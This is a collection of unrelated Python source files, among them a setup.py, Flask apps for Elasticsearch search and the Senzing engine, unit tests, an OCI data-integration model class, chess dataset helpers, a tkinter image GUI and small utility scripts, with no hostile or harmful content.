clpy.ndarray: If no copy is required, it returns ``a``. Otherwise, it
returns a copy of ``a``.
.. seealso:: :func:`numpy.ascontiguousarray`
"""
return core.ascontiguousarray(a, dtype)
# TODO(okuta): Implement asmatrix
def copy(a, order='K'):
"""Creates a copy of a given array on the current device.
This function allocates the new array on the current device. If the given
array is allocated on the different device, then this function tries to
copy the contents over the devices.
Args:
a (clpy.ndarray): The source array.
order ({'C', 'F', 'A', 'K'}): Row-major (C-style) or column-major
(Fortran-style) order.
When `order` is 'A', it uses 'F' if `a` is column-major and
uses `C` otherwise.
And when `order` is 'K', it keeps strides as closely as
possible.
Returns:
clpy.ndarray: The copy of ``a`` on the current device.
See: :func:`numpy.copy`, :meth:`clpy.ndarray.copy`
"""
# If the current device is different from the device of ``a``, then this
# function allocates a new array on the current device, and copies the
# contents over the devices.
return a.copy(order=order)
# TODO(okuta): Implement frombuffer
# TODO(okuta): Implement fromfile
# TODO(okuta): Implement fromfunction
# TODO(okuta): Implement fromiter
# TODO(okuta): Implement fromstring
# TODO(okuta): Implement loadtxt
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
"""
Copyright 2021 DataDistillr Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pathlib import Path
from setuptools import setup, find_packages
this_directory = Path(__file__).parent
setup_args = dict(
name='datadistillr',
version='1.0.0',
author='Charles Givre, Amanda Ha, Andrea Ha, Sanaa Mironov',
author_email='charles@datadistillr.com',
packages=find_packages(include=['datadistillr', 'datadistillr.*']),
url='https://github.com/datadistillr/datadistillr-python-sdk',
license="Apache",
description='A Python SDK for interacting with datasets created on DataDistillr',
long_description = (this_directory / "README.md").read_text(encoding='utf-8'),
long_description_content_type="text/markdown",
install_requires=[
"pandas",
"requests",
"urllib3"
],
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: SQL',
'Operating System :: OS Independent',
'Topic :: Database'
]
)
def main():
"""
Runs the setup of DataDistillr.
:return: Nothing
"""
setup(**setup_args)
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
from .Body import Body
from .Headers import Headers
from .Query import Query
Body = Body
Headers = Headers
Query = Query
|
nilq/baby-python
|
python
|
import math
from urllib.parse import unquote
from elasticsearch import Elasticsearch
from flask import Flask, render_template, request, url_for
app = Flask(__name__)
es = Elasticsearch()
@app.route("/", methods=["GET"])
def index():
def parse_filter(term):
key, value = term[:term.index(":")], term[term.index(":") + 1:]
exclude = key.startswith("!")
exact = value.startswith("=")
return key[int(exclude):], value[int(exact):], exclude, exact
page = max(1, request.args.get("p", 1, type=int))
min_stars = max(0, request.args.get("s", 0, type=int))
max_ops = max(0, request.args.get("o", 1000, type=int))
terms = unquote(request.args.get("q", "", type=str)).split()
# Extract free text query and filters
filters, free_text_query = [], []
for term in terms:
if ":" in term:
parsed_filter = parse_filter(term)
if len(parsed_filter[1]) > 0:
filters.append(parsed_filter)
continue
free_text_query.append(term)
free_text_query = " ".join(free_text_query)
# Create query and search
query, applied_filters = create_query(free_text_query, filters, min_stars, max_ops)
results = es.search(body={"query": query}, from_=(page - 1) * 10, size=10)
# Parse results
num_pages = math.ceil(results["hits"]["total"]["value"] / 10)
parsed_results = list(map(lambda result: result["_source"], results["hits"]["hits"]))
prev_page_url = url_for("index", q=request.args.get("q"), p=max(page - 1, 1), s=min_stars, o=max_ops)
next_page_url = _url = url_for("index", q=request.args.get("q"), p=min(page + 1, num_pages), s=min_stars, o=max_ops)
first_page_url = url_for("index", q=request.args.get("q"), p=1, s=min_stars, o=max_ops)
return render_template("index.html", query=free_text_query, filters=applied_filters, results=parsed_results,
prev=prev_page_url, next=next_page_url, first=first_page_url, page=page, num_pages=num_pages,
min_stars=min_stars, max_ops=max_ops)
def create_query(free_text_query, filters, min_stars, max_ops):
query = {
"function_score": {
"query": {
"bool": {
"must": [{"multi_match": {
"query": free_text_query,
"fields": ["name^5", "search_name^5", "docstring^4", "arguments^3", "returns^2", "keywords"]
}}],
"filter": [{"range": {"star_count": {"gte": min_stars}}},
{"range": {"num_operations": {"lte": max_ops}}}],
"must_not": []
},
},
"script_score": {
"script": {
"source": "_score * Math.max(0.1, Math.log(1 + doc['star_count'].value) - 0.2 * Math.log(1 + doc['num_operations'].value))"
}
},
"boost_mode": "replace"
}
}
applied_filters = []
for field, value, exclude, exact in filters:
if exact:
item = {"term": {f"{field}.keyword": {"value": value}}}
else:
item = {"wildcard": {f"{field}": {"value": f"*{value}*"}}}
query["function_score"]["query"]["bool"]["must_not" if exclude else "filter"].append(item)
applied_filters.append({"key": field, "value": value, "exclude": exclude, "exact": exact})
return query, applied_filters
if __name__ == "__main__":
app.run()
|
nilq/baby-python
|
python
|
"""This module contains handler functions that should be run before each application request."""
from logging import getLogger, Logger
from flask import request
log: Logger = getLogger(__name__)
def log_incoming_request() -> None:
"""Fully log incoming request for debbuging purposes."""
# This is possible security vulnerability, please see: http://esd.io/blog/flask-apps-heroku-real-ip-spoofing.html
x_forwarded_for = next(iter(request.headers.getlist("X-Forwarded-For")), None)
request_origin = x_forwarded_for if x_forwarded_for else request.remote_addr
log.debug("Received %s request for path '%s' from %s", request.method, request.path, request_origin)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import app_config
import json
import unittest
from admin import *
from fabfile import data
from models import models
from peewee import *
class FilterResultsTestCase(unittest.TestCase):
"""
Testing filtering for state-level results
"""
def setUp(self):
data.load_results()
data.create_calls()
def test_results_filtering(self):
filtered = utils.filter_results()
self.assertEqual(filtered.count(), 185)
def test_results_grouping(self):
filtered = utils.filter_results()
grouped = utils.group_results_by_race(filtered)
self.assertEqual(len(grouped), 22)
class CallRacesTestCase(unittest.TestCase):
"""
Testing race calling logic
"""
def setUp(self):
data.load_results()
data.create_calls()
self.test_app = admin.app.test_client()
def send_ap_post(self):
response = self.test_app.post(
'/%s/calls/accept-ap' % app_config.PROJECT_SLUG,
data={
'race_id': '12044'
}
)
results = models.Result.select().where(
models.Result.level == 'state',
models.Result.raceid == '12044'
)
return results
def send_npr_post(self):
response = self.test_app.post(
'/%s/calls/call-npr' % app_config.PROJECT_SLUG,
data={
'race_id': '12044',
'result_id': '12044-polid-1746-state-1'
}
)
result = models.Result.get(models.Result.id == '12044-polid-1746-state-1')
race_results = models.Result.select().where(
models.Result.level == 'state',
models.Result.raceid == '12044'
)
return result, race_results
def test_accepting_ap(self):
true_results = self.send_ap_post()
for result in true_results:
self.assertTrue(result.call[0].accept_ap)
def test_calling_npr(self):
called_result, race_results = self.send_npr_post()
self.assertTrue(called_result.call[0].override_winner)
for result in race_results:
self.assertFalse(result.call[0].accept_ap)
if __name__ == '__main__':
unittest.main()
|
nilq/baby-python
|
python
|
from __future__ import unicode_literals
from django.test import TestCase
from .factories import ServiceTicketFactory
from .utils import parse
from mama_cas.request import SingleSignOutRequest
class SingleSignOutRequestTests(TestCase):
"""
Test the ``SingleSignOutRequest`` SAML output.
"""
def setUp(self):
self.st = ServiceTicketFactory()
def test_sso_request(self):
"""
A ``SingleSignOutRequest`` should contain the ticket string
from the provided context.
"""
content = SingleSignOutRequest(context={'ticket': self.st}).render_content()
session_index = parse(content).find('./SessionIndex')
self.assertIsNotNone(session_index)
self.assertEqual(session_index.text, self.st.ticket)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
import os
import signal
import sys
import time
import json
from flask import Flask, render_template
app = Flask(__name__)
def signal_handler(signal, frame):
sys.exit(0)
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
def get_directory_paths():
''' Establish paths to dependencies. '''
project_dir = os.environ.get("SENZING_PROJECT_DIR", None)
if project_dir:
senzing_data_dir = "{0}/data".format(project_dir)
senzing_etc_dir = "{0}/etc".format(project_dir)
senzing_g2_dir = "{0}/g2".format(project_dir)
senzing_var_dir = "{0}/var".format(project_dir)
else:
senzing_data_dir = os.environ.get("SENZING_DATA_DIR", "/opt/senzing/data")
senzing_etc_dir = os.environ.get("SENZING_ETC_DIR", "/etc/opt/senzing")
senzing_g2_dir = os.environ.get("SENZING_G2_DIR", "/opt/senzing/g2")
senzing_var_dir = os.environ.get("SENZING_VAR_DIR", "/var/opt/senzing")
return {
"dataDir": senzing_data_dir,
"etcDir": senzing_etc_dir,
"g2Dir": senzing_g2_dir,
"varDir": senzing_var_dir
}
# Add python directory to System Path.
directory_paths = get_directory_paths()
print(directory_paths)
sys.path.append("{0}/python".format(directory_paths.get('g2Dir')))
# Import Senzing Engine.
try:
from G2Engine import G2Engine
from G2Audit import G2Audit
from G2Product import G2Product
except:
print("ERROR: Could not import G2Engine, G2Audit, G2Product")
print("Ctrl-C to exit")
time.sleep(3600)
sys.exit(0)
# -----------------------------------------------------------------------------
# Senzing configuration.
# -----------------------------------------------------------------------------
def get_g2_configuration_dictionary():
''' Construct a dictionary in the form of the old ini files. '''
directory_paths = get_directory_paths()
# Special case: Temporary work-around for /opt/senzing/data/1.0.0
senzing_support_path = directory_paths.get('dataDir')
test_data_dir_path = "{0}/1.0.0".format(senzing_support_path)
if os.path.exists(test_data_dir_path):
senzing_support_path = test_data_dir_path
# Construct configuration dictionary.
result = {
"PIPELINE": {
"CONFIGPATH": os.environ.get("SENZING_CONFIG_PATH", directory_paths.get('etcDir')),
"RESOURCEPATH": os.environ.get("SENZING_RESOURCE_PATH", "{0}/resources".format(directory_paths.get('g2Dir'))),
"SUPPORTPATH": os.environ.get("SENZING_SUPPORT_PATH", senzing_support_path),
},
"SQL": {
"CONNECTION": os.environ.get("SENZING_DATABASE_URL", "sqlite3://na:na@{0}/sqlite/G2C.db".format(directory_paths.get('varDir'))),
}
}
return result
def get_g2_configuration_json():
''' Transform dictionary to JSON string. '''
return json.dumps(get_g2_configuration_dictionary())
# -----------------------------------------------------------------------------
# Initialization
# -----------------------------------------------------------------------------
g2_configuration_json = get_g2_configuration_json()
verbose_logging = False
config_id = bytearray([])
# Initialize Senzing G2 modules.
g2_engine = G2Engine()
g2_engine.initV2('pyG2', g2_configuration_json, verbose_logging)
g2_audit = G2Audit()
g2_audit.initV2('pyG2Audit', g2_configuration_json, verbose_logging)
g2_product = G2Product()
g2_product.initV2('pyG2Product', g2_configuration_json, verbose_logging)
# -----------------------------------------------------------------------------
# @app.routes
# -----------------------------------------------------------------------------
@app.route("/")
def app_root():
# Get version and format it.
version_string = g2_product.version()
version_dictionary = json.loads(version_string)
version = json.dumps(version_dictionary, sort_keys=True, indent=4)
# Get license and format it.
license_string = g2_product.license()
license_dictionary = json.loads(license_string)
license = json.dumps(license_dictionary, sort_keys=True, indent=4)
# Get config and format it.
config_string = bytearray()
result = g2_engine.exportConfig(config_string, config_id)
config_dictionary = json.loads(config_string)
config = json.dumps(config_dictionary, sort_keys=True, indent=4)
# Get summary and format it.
summary_string = bytearray()
result = g2_audit.getSummaryDataDirect(summary_string)
summary_dictionary = json.loads(summary_string)
summary = json.dumps(summary_dictionary, sort_keys=True, indent=4)
# Render template in to HTML page.
return render_template("index.html", version=version, config=config, summary=summary, license=license)
# -----------------------------------------------------------------------------
# Main
# -----------------------------------------------------------------------------
if __name__ == '__main__':
app.run()
|
nilq/baby-python
|
python
|
import tkinter
import tkinter.filedialog
from PIL import Image,ImageTk
from torchvision import transforms as transforms
from test import main,model
# 创建UI
win = tkinter.Tk()
win.title("picture process")
win.geometry("1280x1080")
# 声明全局变量
original = Image.new('RGB', (300, 400))
save_img = Image.new('RGB', (300, 400))
count = 0
e2 = None
e2 = str(e2)
file_name = None
img2 = tkinter.Label(win)
def choose_file():
'''选择一张照片'''
select_file = tkinter.filedialog.askopenfilename(title='select the picture')
global file_name
file_name=select_file
e.set(select_file)
load = Image.open(select_file)
load = transforms.Resize((400,400))(load)
# 声明全局变量
global original
original = load
render = ImageTk.PhotoImage(load)
img = tkinter.Label(win,image=render)
img.image = render
img.place(x=100,y=100)
def coloring():
'''图片生成'''
model()
new_img = Image.open('generate.png')
new_img = transforms.Resize((400,400))(new_img)
render = ImageTk.PhotoImage(new_img)
global img2
img2.destroy()
img2 = tkinter.Label(win,image=render)
img2.image = render
img2.place(x=800,y=100)
def transfer():
main(file_name)
model()
new_img = Image.open('generate.png')
new_img = transforms.Resize((400,400))(new_img)
render = ImageTk.PhotoImage(new_img)
global img2
img2.destroy()
img2 = tkinter.Label(win,image=render)
img2.image = render
img2.place(x=800,y=100)
def edge_detect():
'''边缘检测'''
main(file_name)
new_img = Image.open('canny&HED.jpg')
new_img = transforms.Resize((400,400))(new_img)
render = ImageTk.PhotoImage(new_img)
global img2
img2.destroy()
img2 = tkinter.Label(win,image=render)
img2.image = render
img2.place(x=800,y=100)
e = tkinter.StringVar()
e_entry = tkinter.Entry(win, width=68, textvariable=e)
e_entry.pack()
# 文件选择
button1 = tkinter.Button(win, text ="Select", command = choose_file)
button1.pack()
button2 = tkinter.Button(win, text="edge detect" , command = edge_detect,width=20,height =1)
button2.place(x=570,y=200)
button3 = tkinter.Button(win, text="coloring" , command = coloring,width=20,height =1)
button3.place(x=570,y=300)
button4 = tkinter.Button(win, text="style transfer" , command = transfer,width=20,height =1)
button4.place(x=570,y=400)
label1 = tkinter.Label(win,text="Original Picture")
label1.place(x=250,y=50)
label2 = tkinter.Label(win,text="style transfer!")
label2.place(x=950,y=50)
# 退出按钮
button0 = tkinter.Button(win,text="Exit",command=win.quit,width=20,height =1)
button0.place(x=570,y=650)
win.mainloop()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2015 RAPP
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Authors: Konstantinos Panayiotou, Manos Tsardoulias
# contact: klpanagi@gmail.com, etsardou@iti.gr
## @file RandStrGen/RandStrGen.py
#
# @copyright Rapp Projecty EU 2015
# @author Konstantinos Panayiotou, [klpanagi@gmail.com]
#
import random
import string
class RandStrGen:
""" Random String Generator static class (Namespace).
Generates random string boundaries.
"""
@staticmethod
def create(size):
"""! Generate a nwe random string
@param size string - Number of characters for the random string to generate
"""
randStr = ''.join(
random.SystemRandom().choice(
string.ascii_uppercase + string.ascii_lowercase + string.digits)
for _ in range(size))
return randStr
|
nilq/baby-python
|
python
|
# Train FSDKaggle2018 model
#
import sys
sys.path.append('../..')
from lib_train import *
conf.logdir = 'logs_mobilenetv2_small'
conf.best_weight_file = 'best_mobilenetv2_small_weight.h5'
# 1. Load Meta data
DATAROOT = Path.home() / '.kaggle/competitions/freesound-audio-tagging'
#Data frame for training dataset
df_train = pd.read_csv(DATAROOT / 'train.csv')
#Plain y_train label
plain_y_train = np.array([conf.label2int[l] for l in df_train.label])
# 2. Preprocess data if it's not ready
def fsdkaggle2018_map_y_train(idx_train, plain_y_train):
return np.array([plain_y_train[i] for i in idx_train])
def fsdkaggle2018_make_preprocessed_train_data():
conf.folder.mkdir(parents=True, exist_ok=True)
if not os.path.exists(conf.X_train):
XX = mels_build_multiplexed_X(conf, [DATAROOT/'audio_train'/fname for fname in df_train.fname])
X_train, y_train, X_test, y_test = \
train_valid_split_multiplexed(conf, XX, plain_y_train, demux=True)
np.save(conf.X_train, X_train)
np.save(conf.y_train, y_train)
np.save(conf.X_test, X_test)
np.save(conf.y_test, y_test)
fsdkaggle2018_make_preprocessed_train_data()
# 3. Load all dataset & normalize
X_train, y_train = load_audio_datafiles(conf, conf.X_train, conf.y_train, normalize=True)
X_test, y_test = load_audio_datafiles(conf, conf.X_test, conf.y_test, normalize=True)
print('Loaded train:test = {}:{} samples.'.format(len(X_train), len(X_test)))
# 4. Train folds
history, model, plain_datagen = train_model(conf, fold=0,
dataset=[X_train, y_train, X_test, y_test],
model=None,
init_weights=None, # from scratch
#init_weights='../../model/mobilenetv2_small_fsd2018_41cls.h5'
)
# 5. Evaluate
evaluate_model(conf, model, X_test, y_test)
print('___ training finished ___')
|
nilq/baby-python
|
python
|
"""
GFS2FileSystemBlockSize - command ``stat -fc %s <mount_point_path>``
====================================================================
The parser parse the output of ``stat -fc %s <mount_point_path>``
"""
from insights import parser, CommandParser
from insights.specs import Specs
from insights.parsers import SkipException
@parser(Specs.gfs2_file_system_block_size)
class GFS2FileSystemBlockSize(CommandParser):
"""
Class for parsing ``stat -fc %s <mount_point_path>`` command output.
The size is kept in the ``block_size`` property.
Typical output of command ``stat -fc %s <mount_point_path>`` looks like::
4096
Examples::
>>> type(gfs2_mp)
<class 'insights.parsers.gfs2_file_system_block_size.GFS2FileSystemBlockSize'>
>>> gfs2_mp.block_size
4096
Raise::
SkipException: When the content isn't in the expected format.
Attributes::
block_size (int): The block size of the gfs2 file system.
"""
def parse_content(self, content):
if len(content) == 1 and content[0].isdigit():
self.block_size = int(content[0])
else:
raise SkipException('The output is invalid.')
|
nilq/baby-python
|
python
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from .operator import Operator
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class Joiner(Operator):
"""
The information about a joiner object.
"""
#: A constant which can be used with the join_type property of a Joiner.
#: This constant has a value of "INNER"
JOIN_TYPE_INNER = "INNER"
#: A constant which can be used with the join_type property of a Joiner.
#: This constant has a value of "FULL"
JOIN_TYPE_FULL = "FULL"
#: A constant which can be used with the join_type property of a Joiner.
#: This constant has a value of "LEFT"
JOIN_TYPE_LEFT = "LEFT"
#: A constant which can be used with the join_type property of a Joiner.
#: This constant has a value of "RIGHT"
JOIN_TYPE_RIGHT = "RIGHT"
def __init__(self, **kwargs):
"""
Initializes a new Joiner object with values from keyword arguments. The default value of the :py:attr:`~oci.data_integration.models.Joiner.model_type` attribute
of this class is ``JOINER_OPERATOR`` and it should not be changed.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param model_type:
The value to assign to the model_type property of this Joiner.
Allowed values for this property are: "SOURCE_OPERATOR", "FILTER_OPERATOR", "JOINER_OPERATOR", "AGGREGATOR_OPERATOR", "PROJECTION_OPERATOR", "TARGET_OPERATOR", "DISTINCT_OPERATOR", "SORT_OPERATOR", "UNION_OPERATOR", "INTERSECT_OPERATOR", "MINUS_OPERATOR", "MERGE_OPERATOR", "START_OPERATOR", "END_OPERATOR", "PIPELINE_OPERATOR", "TASK_OPERATOR", "EXPRESSION_OPERATOR", "LOOKUP_OPERATOR", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type model_type: str
:param key:
The value to assign to the key property of this Joiner.
:type key: str
:param model_version:
The value to assign to the model_version property of this Joiner.
:type model_version: str
:param parent_ref:
The value to assign to the parent_ref property of this Joiner.
:type parent_ref: oci.data_integration.models.ParentReference
:param name:
The value to assign to the name property of this Joiner.
:type name: str
:param description:
The value to assign to the description property of this Joiner.
:type description: str
:param object_version:
The value to assign to the object_version property of this Joiner.
:type object_version: int
:param input_ports:
The value to assign to the input_ports property of this Joiner.
:type input_ports: list[oci.data_integration.models.InputPort]
:param output_ports:
The value to assign to the output_ports property of this Joiner.
:type output_ports: list[oci.data_integration.models.OutputPort]
:param object_status:
The value to assign to the object_status property of this Joiner.
:type object_status: int
:param identifier:
The value to assign to the identifier property of this Joiner.
:type identifier: str
:param parameters:
The value to assign to the parameters property of this Joiner.
:type parameters: list[oci.data_integration.models.Parameter]
:param op_config_values:
The value to assign to the op_config_values property of this Joiner.
:type op_config_values: oci.data_integration.models.ConfigValues
:param join_type:
The value to assign to the join_type property of this Joiner.
Allowed values for this property are: "INNER", "FULL", "LEFT", "RIGHT", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type join_type: str
:param join_condition:
The value to assign to the join_condition property of this Joiner.
:type join_condition: oci.data_integration.models.Expression
"""
self.swagger_types = {
'model_type': 'str',
'key': 'str',
'model_version': 'str',
'parent_ref': 'ParentReference',
'name': 'str',
'description': 'str',
'object_version': 'int',
'input_ports': 'list[InputPort]',
'output_ports': 'list[OutputPort]',
'object_status': 'int',
'identifier': 'str',
'parameters': 'list[Parameter]',
'op_config_values': 'ConfigValues',
'join_type': 'str',
'join_condition': 'Expression'
}
self.attribute_map = {
'model_type': 'modelType',
'key': 'key',
'model_version': 'modelVersion',
'parent_ref': 'parentRef',
'name': 'name',
'description': 'description',
'object_version': 'objectVersion',
'input_ports': 'inputPorts',
'output_ports': 'outputPorts',
'object_status': 'objectStatus',
'identifier': 'identifier',
'parameters': 'parameters',
'op_config_values': 'opConfigValues',
'join_type': 'joinType',
'join_condition': 'joinCondition'
}
self._model_type = None
self._key = None
self._model_version = None
self._parent_ref = None
self._name = None
self._description = None
self._object_version = None
self._input_ports = None
self._output_ports = None
self._object_status = None
self._identifier = None
self._parameters = None
self._op_config_values = None
self._join_type = None
self._join_condition = None
self._model_type = 'JOINER_OPERATOR'
@property
def join_type(self):
"""
Gets the join_type of this Joiner.
joinType
Allowed values for this property are: "INNER", "FULL", "LEFT", "RIGHT", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The join_type of this Joiner.
:rtype: str
"""
return self._join_type
@join_type.setter
def join_type(self, join_type):
"""
Sets the join_type of this Joiner.
joinType
:param join_type: The join_type of this Joiner.
:type: str
"""
allowed_values = ["INNER", "FULL", "LEFT", "RIGHT"]
if not value_allowed_none_or_none_sentinel(join_type, allowed_values):
join_type = 'UNKNOWN_ENUM_VALUE'
self._join_type = join_type
@property
def join_condition(self):
"""
Gets the join_condition of this Joiner.
:return: The join_condition of this Joiner.
:rtype: oci.data_integration.models.Expression
"""
return self._join_condition
@join_condition.setter
def join_condition(self, join_condition):
"""
Sets the join_condition of this Joiner.
:param join_condition: The join_condition of this Joiner.
:type: oci.data_integration.models.Expression
"""
self._join_condition = join_condition
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
nilq/baby-python
|
python
|
"""Methods specific to handling chess datasets.
"""
import torch
import torchvision
import typing
import logging
from enum import Enum
import numpy as np
import chess
from recap import URI, CfgNode as CN
from .transforms import build_transforms
from .datasets import Datasets
logger = logging.getLogger(__name__)
def color_name(color: chess.Color) -> str:
"""Convert a chess color to a string.
Args:
color (chess.Color): the color
Returns:
str: the string representation
"""
return {chess.WHITE: "white",
chess.BLACK: "black"}[color]
def piece_name(piece: chess.Piece) -> str:
"""Convert a chess piece to a string.
Args:
piece (chess.Piece): the piece
Returns:
str: the corresponding string
"""
return f"{color_name(piece.color)}_{chess.piece_name(piece.piece_type)}"
def name_to_piece(name: str) -> chess.Piece:
"""Convert the name of a piece to an instance of :class:`chess.Piece`.
Args:
name (str): the name of the piece
Returns:
chess.Piece: the instance of :class:`chess.Piece`
"""
color, piece_type = name.split("_")
color = color == "white"
piece_type = chess.PIECE_NAMES.index(piece_type)
return chess.Piece(piece_type, color)
def build_dataset(cfg: CN, mode: Datasets) -> torch.utils.data.Dataset:
"""Build a dataset from its configuration.
Args:
cfg (CN): the config object
mode (Datasets): the split (important to figure out which transforms to apply)
Returns:
torch.utils.data.Dataset: the dataset
"""
transform = build_transforms(cfg, mode)
dataset = torchvision.datasets.ImageFolder(root=URI(cfg.DATASET.PATH) / mode.value,
transform=transform)
return dataset
def build_data_loader(cfg: CN, dataset: torch.utils.data.Dataset, mode: Datasets) -> torch.utils.data.DataLoader:
"""Build a data loader for a dataset.
Args:
cfg (CN): the config object
dataset (torch.utils.data.Dataset): the dataset
mode (Datasets): the split
Returns:
torch.utils.data.DataLoader: the data loader
"""
shuffle = mode in {Datasets.TRAIN, Datasets.VAL}
return torch.utils.data.DataLoader(dataset, batch_size=cfg.DATASET.BATCH_SIZE,
shuffle=shuffle, num_workers=cfg.DATASET.WORKERS)
|
nilq/baby-python
|
python
|
option = 'Yy'
print ('\033[1;32m{:=^40}\033[m'.format(' ANNUAL STUDENT RESULT '))
while option == 'Yy':
nome = str(input('\033[1mType your name: '))
n1 = float(input('\033[1;33m{}\033[m \033[1;32mType a first note:\033[m '.format(nome.lower().capitalize())))
n2 = float(input('\033[1;33m{}\033[m \033[1;32mEnter your second note:\033[m '.format(nome.lower().capitalize())))
n3 = float(input('\033[1;33m{}\033[m \033[1;32mEnter your second note:\033[m '.format(nome.lower().capitalize())))
n4 = float(input('\033[1;33m{}\033[m \033[1;32mEnter your second note:\033[m '.format(nome.lower().capitalize())))
média = (n1+n2+n3+n4)/4
print ('\033[1m{} Your average is\033[m \033[1;36m{:.1f}\033[m'.format(nome.lower().capitalize(), média))
option = str(input('\033[1mDo you wish to continue? [Yes/No]\033[m ')).upper().strip()[0]
print ('\033[1;32m{:=^40}\033[m'.format(' RESULT '))
if média <= 4:
print ('\033[1mVocê está\033[m \033[1;31mDISAPPROVED\033[m')
elif média == 5:
print ('\033[1mVocê está em\033[m \033[1;33mRECOVERY\033[m')
else:
print ('\033[1mVocê foi\033[m \033[1;36mAAPPROVED\033[m')
print ('\033[1;35mOperation completed\033[m')
|
nilq/baby-python
|
python
|
from shared.numeric import is_permutation
from shared.generators import infinite_range
def is_max_permutation(number: int, multiple: int) -> bool:
for i in range(2, multiple + 1):
if not is_permutation(number, number * i):
return False
return True
def permutation_multiples(multiple: int) -> int:
for i in infinite_range(1):
if is_max_permutation(i, multiple):
return i
def main() -> None:
m = permutation_multiples(6)
print(m)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
import pandas as pd
from estimators.FuzzyFlow import FuzzyFlow
fuzzy = FuzzyFlow()
dat = pd.read_csv('../sampling_617685_metric_10min_datetime.csv',parse_dates=True,index_col=0)[:3000]
dat = pd.Series(dat['cpu_rate'].round(3))
fuzzy.fit_transform(dat)
|
nilq/baby-python
|
python
|
input_str = input("Enter a list of elements: ")
list1 = [int(x) for x in input_str.split() if int(x) % 2 == 0]
print(list1)
|
nilq/baby-python
|
python
|
"""
URLconf for ``access_log`` app.
"""
# Prefix URL names with the app name. Avoid URL namespaces unless it is likely
# this app will be installed multiple times in a single project.
from django.conf.urls import include, patterns, url
urlpatterns = patterns(
'access_log.views',
url(r'^downloads/(?P<content_type>\d+)/$',
'downloads',
name='access_log_downloads'),
url(r'^downloads/(?P<content_type>\d+)/(?P<object_id>\d+)/$',
'downloads',
name='access_log_downloads'),
)
|
nilq/baby-python
|
python
|
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(in_channels=3, out_channels=64, kernel_size=7, stride=3, padding=0),
nn.BatchNorm2d(64),
nn.MaxPool2d(kernel_size=3, stride=2),
nn.Dropout2d(0.5),
nn.ReLU(inplace=True)
)
self.conv2 = nn.Sequential(
nn.Conv2d(in_channels=64, out_channels=256, kernel_size=5, stride=1, padding=0),
nn.BatchNorm2d(256),
nn.MaxPool2d(kernel_size=3, stride=2),
nn.Dropout2d(0.5),
nn.ReLU(inplace=True)
)
self.conv3 = nn.Sequential(
nn.Conv2d(in_channels=256, out_channels=400, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(400),
nn.Dropout2d(0.5),
nn.ReLU(inplace=True)
)
self.conv4 = nn.Sequential(
nn.Conv2d(in_channels=400, out_channels=576, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(576),
nn.Dropout2d(0.5),
nn.ReLU(inplace=True)
)
self.conv5 = nn.Sequential(
nn.Conv2d(in_channels=576, out_channels=1024, kernel_size=3, stride=1, padding=0),
nn.BatchNorm2d(1024),
nn.Dropout2d(0.5),
nn.ReLU(inplace=True)
)
# self.fc1 = nn.Linear(12544, 3136)
# self.fc2 = nn.Linear(3136, 392)
# self.fc3 = nn.Linear(392, 1)
self.fc1 = nn.Linear(14400, 1440)
self.fc2 = nn.Linear(1440, 144)
self.fc3 = nn.Linear(144, 30)
def forward(self, x):
x = x.cuda()
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
x = self.conv4(x)
x = x.view(-1, self.num_flat_features(x))
x = F.relu(self.fc1(x), inplace=True)
x = F.relu(self.fc2(x), inplace=True)
x = self.fc3(x)
return x
def num_flat_features(self, x):
size = x.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
|
nilq/baby-python
|
python
|
__all__ = [
"AuthenticationViewDjangoMixin",
"AuthenticationViewMixin",
"AuthenticationViewRestMixin",
"Authenticator",
]
from .authenticator import Authenticator
from .views import AuthenticationViewDjangoMixin, AuthenticationViewMixin, AuthenticationViewRestMixin
|
nilq/baby-python
|
python
|
# Copyright (c) 2006-2012 Filip Wasilewski <http://en.ig.ma/>
# Copyright (c) 2012-2016 The PyWavelets Developers
